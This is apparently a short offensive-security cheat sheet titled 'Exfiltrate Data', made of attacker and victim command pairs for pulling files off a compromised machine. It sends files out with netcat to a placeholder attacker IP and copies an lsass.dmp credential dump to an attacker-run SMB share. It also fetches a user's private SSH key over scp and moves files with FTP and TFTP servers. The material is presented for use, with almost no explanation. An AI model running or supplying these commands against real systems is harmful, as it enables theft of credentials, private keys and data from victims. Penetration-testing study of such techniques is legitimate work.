Exfiltrate Data
# Attacker
nc -lnvp 1234 > file.txt
# Victim
nc.exe -vn <attacker-ip> 1234 < file.txt
# Important: Always close the connection from the receiver to avoid losing the shell.
# Attacker
sudo impacket-smbserver -comment "SHARE" TMP /home/<username>/smb -smb2support
# Victim
copy-item -path c:\windows\tasks\lsass.dmp \\<attacker-ip>\tmp\lsass.dmp
Download private key from user to my machine
scp <username>@<victim-ip>:/home/<username>/.ssh/id_rsa ~/.ssh/<username>.key
# pip install pyftpdlib
# Attacker
python -m pyftpdlib -p 21
# Victim
# Put file
tftp -i <attacker-ip> PUT file.txt
# Get file
tftp -i <attacker-ip> GET file.txt
Last modified 12d ago